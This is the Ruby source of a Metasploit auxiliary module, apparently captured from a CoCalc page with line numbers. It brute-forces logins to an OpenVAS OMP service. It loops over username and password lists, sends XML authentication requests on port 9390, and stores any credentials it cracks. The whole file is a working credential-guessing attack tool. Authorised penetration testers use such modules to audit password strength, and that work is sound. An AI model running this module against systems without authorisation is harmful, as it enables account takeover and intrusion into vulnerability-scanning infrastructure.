CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Tcp
8
  include Msf::Auxiliary::Scanner
9
  include Msf::Auxiliary::Report
10
  include Msf::Auxiliary::AuthBrute
11

12
  def initialize
13
    super(
14
      'Name'        => 'OpenVAS OMP Login Utility',
15
      'Description' => 'This module attempts to authenticate to an OpenVAS OMP service.',
16
      'Author'      => [ 'Vlatko Kosturjak <kost[at]linux.hr>' ],
17
      'License'     => MSF_LICENSE
18
    )
19
    register_options(
20
      [
21
        Opt::RPORT(9390),
22
        OptBool.new('BLANK_PASSWORDS', [false, "Try blank passwords for all users", false])
23
      ]
24
    )
25
  end
26

27
  def run_host(ip)
28
    begin
29
      print_status("#{msg} Connecting and checking username and passwords")
30
      each_user_pass do |user, pass|
31
        do_login(user, pass)
32
      end
33
    rescue ::Rex::ConnectionError
34
    rescue ::Exception => e
35
      vprint_error("#{msg} #{e.to_s} #{e.backtrace}")
36
    end
37
  end
38

39
  def omp_send(data=nil, con=true)
40
    begin
41
      @result=''
42
      @coderesult=''
43
      if (con)
44
        @connected=false
45
        connect
46
        select(nil,nil,nil,0.4)
47
      end
48
      @connected=true
49
      sock.put(data)
50
      @result=sock.get_once
51
    rescue ::Exception => err
52
      print_error("#{msg} Error: #{err.to_s}")
53
    end
54
  end
55

56
  def report_cred(opts)
57
    service_data = {
58
      address: opts[:ip],
59
      port: opts[:port],
60
      service_name: opts[:service_name],
61
      protocol: 'tcp',
62
      workspace_id: myworkspace_id
63
    }
64

65
    credential_data = {
66
      origin_type: :service,
67
      module_fullname: fullname,
68
      username: opts[:user],
69
      private_data: opts[:password],
70
      private_type: :password
71
    }.merge(service_data)
72

73
    login_data = {
74
      last_attempted_at: Time.now,
75
      core: create_credential(credential_data),
76
      status: Metasploit::Model::Login::Status::SUCCESSFUL,
77
      proof: opts[:proof]
78
    }.merge(service_data)
79

80
    create_credential_login(login_data)
81
  end
82

83
  def do_login(user=nil,pass=nil)
84
    begin
85
      vprint_status("#{msg} Trying user:'#{user}' with password:'#{pass}'")
86
      cmd = "<authenticate><credentials><username>#{user}</username><password>#{pass}</password></credentials></authenticate><HELP/>\r\n"
87
      omp_send(cmd,true) # send hello
88
      if @result =~ /<authenticate_response.*status="200"/is
89
        print_good("#{msg} SUCCESSFUL login for '#{user}' : '#{pass}'")
90
        report_cred(
91
          ip: rhost,
92
          port: rport,
93
          service_name: 'openvas-omp',
94
          user: user,
95
          password: pass,
96
          proof: @result
97
        )
98
        disconnect
99
        @connected = false
100
        return :next_user
101
      else
102
        if (@connected)
103
          disconnect # Sometime openvas disconnect the client after wrongs attempts
104
          @connected = false
105
        end
106
        vprint_error("#{msg} Rejected user: '#{user}' with password: '#{pass}': #{@result}")
107
        return :fail
108
      end
109
      rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
110
      rescue ::Timeout::Error, ::Errno::EPIPE
111
    end
112
  end
113

114
  def msg
115
    "#{rhost}:#{rport} OpenVAS OMP -"
116
  end
117
end
118

119